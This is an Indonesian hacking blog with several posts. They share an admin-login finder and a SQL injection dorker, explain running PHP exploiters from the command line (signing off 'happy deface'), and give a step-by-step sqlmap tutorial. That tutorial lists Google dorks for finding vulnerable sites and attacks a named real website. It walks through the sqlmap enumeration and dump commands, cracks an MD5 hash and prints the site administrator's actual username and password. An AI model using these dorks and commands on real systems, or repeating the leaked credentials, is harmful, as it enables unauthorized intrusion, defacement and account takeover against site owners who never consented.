Wednesday, April 5, 2017

Monday, February 13, 2017

Tool admin finder Phyton (cli)

Selamat pagi semuanya . kembali bertemu sama ane , nubi yang pengen belajar :v
Kali ini ane mau share tool karya mr.haurgeulisx196 , namun link sumbernya ane lupa lagi soalnya udah lama pake tools ini . makasih kepada yang udah buat :v .
Tools ini berfungsi untuk mencari halaman admin login , sangat berguna untuk teman teman yang menggunakan teknik sqli (seperti ini) atau teknik lain yang memungkinkan teman teman mempunyai user + pass admin dari suatu web :)
Tools ini berbasis bahasa Python dan di jalankan di cmd . jika teman teman belum bisa menjalankan file phyton di cmd silahkan ke sini guys.
Link download tool di sini.
Cara pakainya 
1. Setelah di download si lahkan teman teman pindahkan file tool nya ke folder python masing masing. 

2. Masuk ke cmd lalu masukan perintah findah folder "cd c:\python27\foldermasing2"

3. untuk menggunkanya silahkan masukan perintah "python namafile,py"
4. Masukan website yang ingin di scanya kemudian akan ada pilihan tipe halaman adminya pilih saja 0 (semua type). lalu tunggu hingga halaman adminya di tenukan

5. Jika sudah di temukan maka pencarian akan berhenti dan silahkan anda bisa login :).

Sekian post kali ini terimakasih sudah menyempatkan berkunjung . sampai juma :* 



Share:

Friday, February 10, 2017

Tool dorker +scanner sqli


Selamat pagi semuanya . :)  pagi ini saya akan membagikan sebuah tool yang berfungsi sebagai dorker dan scanner sqli . jadi dengan tool ini kita akan lebih mudah mendapatkan web yang vuln terhadap serangan sqli .
Link download : mari 
Tool ini milik bang rieqyns13 atau sumber
Tool ini sayangat mudah di jalankan . :v 

1. Masukan dork di kotak dork.
2. Masukan total website yang ingin anda scan ( masukan 1000 aja :v)
3. Atur search engine . saya sarankan mengguunakan yahoo . karena google sekarang menggunakan chapta . untuk dorking di yahoo, hampir sama dengan di google namun tidak menggunakan "inurl:". Sebagai contoh google : inurl:index.php?id= site:uk , yahoo : index.php?id= site:uk . jelas bukan ? :)
4. Klik search maka tools akan dorking menggunakan search engine yang kita atur sebelumnya.
5. Setelah Muncul result klik scan.
6. Jika ada site yang vulnrable maka akan muncul dan kita siap mengeksekuasinya . ;)

Penampakanya



Untuk tutorial mendapatkan username dan password adminya bisa teman teman baca di sini.
Sekian untuk post kali ini . terimakasih telah berkunjung.



Share:

Thursday, February 9, 2017

Cara Menjalankan exploiter php di cmd (windows)

Selamat pagi semuanya , baru update setelah 3 hari ini banyak kerjaan (kaya yang iye aja :v) .
setelah kemarin update tutorial installasi python maka sekarang saya akan update kembali tutorial menjalanakan exploiter php di cmd . kenapa ? karena sekarang kebanyakan exploiter menggunakan bahasa php.
Apa saja yang perlu teman teman siapkan untuk menjalankan tutorial ini ?
1 . install xampp terlebih dahulu . download di sini
2 . Apabila teman - teman kesusahan dalam installasinya silahakan ke sini
Pastikan xampp sudah terinstall dengan baik di komputer teman teman untuk mencek nya silahkan teman teman buka xampp controlpanelnya klik start pada tombol apache dan mysql dan pastikan setelah di klik muncul pemberitahuan di bawah bahwa apache dan mysqlnya telah berjalan. Untuk lebih jelasnya silahkan perhatikan gambar berikut.































Setelah itu silahkan teman - teman buka browser dan ketikan "localhost" (tanpa tanda petik).  Apabila muncul seperti gambar di bawah, berarti xampp sudah terinstall dengan benar.
















3. Setelah xampp terinstall dengan benar, silahkan tekan start dan cari "view advanced system settings" tanpa tanda petik kemudian pilih yang paing sama dengan yang di cari :v



















4. Setelah di klik dan masuk pilih enviroment variables






























5. Cari path lalu klik setelah itu klik new .




























6. Klik new lalu ketikan "C:\xampp\php" tanpa tanda petik.
Setelah di isi klik ok dan ok . sampai tahap ini tutorial hampir selesai sekarang masuk tahap penggunaan/pemanggilan file phpnya . 
7. untuk percobaan silahkan teman teman download file tes.php di sini .Kemudian pindah kan file tes.php yang teman-teman download ke folder C:\xampp\php

8. Kemudian masuk ke cmd lalu ketikan "cd \xampp\php" perintah ini berfungsi agar kita berpindah ke folder c:\xampp\php dimana file tes tadi di letakan.
9.Setelah itu ketikan perintah "php tes.php" untuk menjalankan file tes yang tadi . dan jika muncul berarti teman teman telah siap menjalankan exploiter php di cmd .
Untuk menjalankan eploiter php silahkan teman teman pindahkan exploiternya/script nya ke C:\xampp\php dan untuk menjalankanya sama dengan menjalankan file tes tadi . :)
Sekian tutorial singkat ini semoga bermanfaat . happy deface :v
Share:

Saturday, February 4, 2017

Tutorial mencari username dan password admin web dengan sqlmap di windows.


Selamat pagi semuanya , kali ini ane mau bikin tutorial mencari username + password dengan sqlmap di windows.
Sqlmap ini adalah tool khusus untuk mengexploit kerentanan yang bertype sqli injection. sqli injection sendiri adalah teknik penyerangan database dengan perintah perintah tertentu sehingga si penyerang dapat mengetahui isi database sebuah web yang di dalamnya terdapat username dan password admin web.

Alat yang di butuhkan :
1. sqlmap
2. pc sudah terinstall python disini
2. web vuln sqli injection
3. komputer :V
4. segelas semangat untuk memulai semuanya :)

lets mulai :v
1. sqlmap silahkan download di sini download yang zip.


















Tools ini berbasis bahasa python jadi untuk menjalankanya silahkan install python terlebih dahulu , untuk tutorialnya disini.
setelah di download silahkan extract . lalu copy kan file nya ke folder c:\python27 (folder python di sesuaikan dengan versi python masing2).
















2. web vuln sqli injection
Untuk web vuln silahkan teman teman cari dengan dork :
inurl:berita.php?id=
inurl:index.php?id=
inurl:details.php?id=
inurl:news.php?id=
(untuk dork bisa teman teman cari di google/buat sendiri karena dork sqli ini sangat bervariasi).
ambil salah satu dork  lalu coba buka satu satu dan tambahkan tanda kutip satu(') di belakang url.
dan jika terjadi errorr seperti " “You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near " atau errorr yang lain berarti web itu vuln sqli. 



























sebagai pembelajaran di sini saya akan memakai web http://www.pakuanraya.com/m/berita.php?id=136

setelah dapat web yang vuln sekarang mari beraksi :v

3. Masuk cmd  kemudian masuk ke direktori sqlmap yang tadi, dengan perintah "cd /python27/sqlmap/" perintah untuk foldernya di sesuaikan dengan nama folder di pc teman teman .
4. Masukan perintah "python sqlmap.py -u target.com --dbs" lalu enter. jika nanti muncul pilihan - pilihan silahkan agan2 pilih yes/tekan enter saja . tunggu sampai muncul nama database nya.
Tuhkan nama nama database nya udah muncul. :)
ket : -u = url target , --dbs = menampilkan databasenya . 

5. Masukan lagi perintah "python sqlmap.py -u target.com -D namadatabase --tables" untuk memunculkan nama nama table dari database yang di pilih . oh iya, yang kita ambil bukan information schema karena db itu ada di setiap web . dan ane belum tau fungsinya :'v . lalu tunggu sampai muncul nama-nama tablenya.





















tuh tablenya keliatan :v .
ket : -D = nama database, --tables = tampilkan table dari db

6. Karena kita mau nyari username+password adminya, maka kita pilih table admin_web (untuk nama table admin bisa user,admin,member tergantung yang bikin web). masukan perintah "python sqlmap.py -u target.com -D namadatabase -T admin_web --columns" untuk menampilkan kolom kolom yang terapat dalam tabel admin_web.








































muncul lagi tuh kolomnya :v.
-T = nama table , --columns = tampilkan kolom dari table yang di pilih.

6. Setelah muncul kolomnya, saatnya kita mengambil username dan passwordnya dengan perintah "python sqlmap.py -u target.com -D namadatabase -T admin_web -C password,username --dump" untuk password dan username sesuaikan dengan nama kolom target agan.
  jika perintah tadi sudah di masukan , maka akan muncul kiran kira gambar sebagai berikut




















kalo di bahasa indonesian gini " bro usernamnya udah ada , tapi passwordnya di encrypt/hash md5 mau di decrypt sama worldlist yang ada di sqlmap nggk ?" kira2 gitu lah :v
kita yes/enter aja siapa tahu ada yang nyangkut . :) .




















ada beberapa password yang berhasil di hash, sayangnya levelnya bukan admin . :v
karena password adminya belum ke hash mari kita coba gunain website decryt md5 online. disini




















tuhkan passwordnya ketemu buat username mulyono :) .
username:mulyono
password: M03--I33

tinnggal nyari login adminya deh :)

sekian tutorial kali ini , tetap panteng blog ini untuk update kedepanya . salam dari nubi.

Share: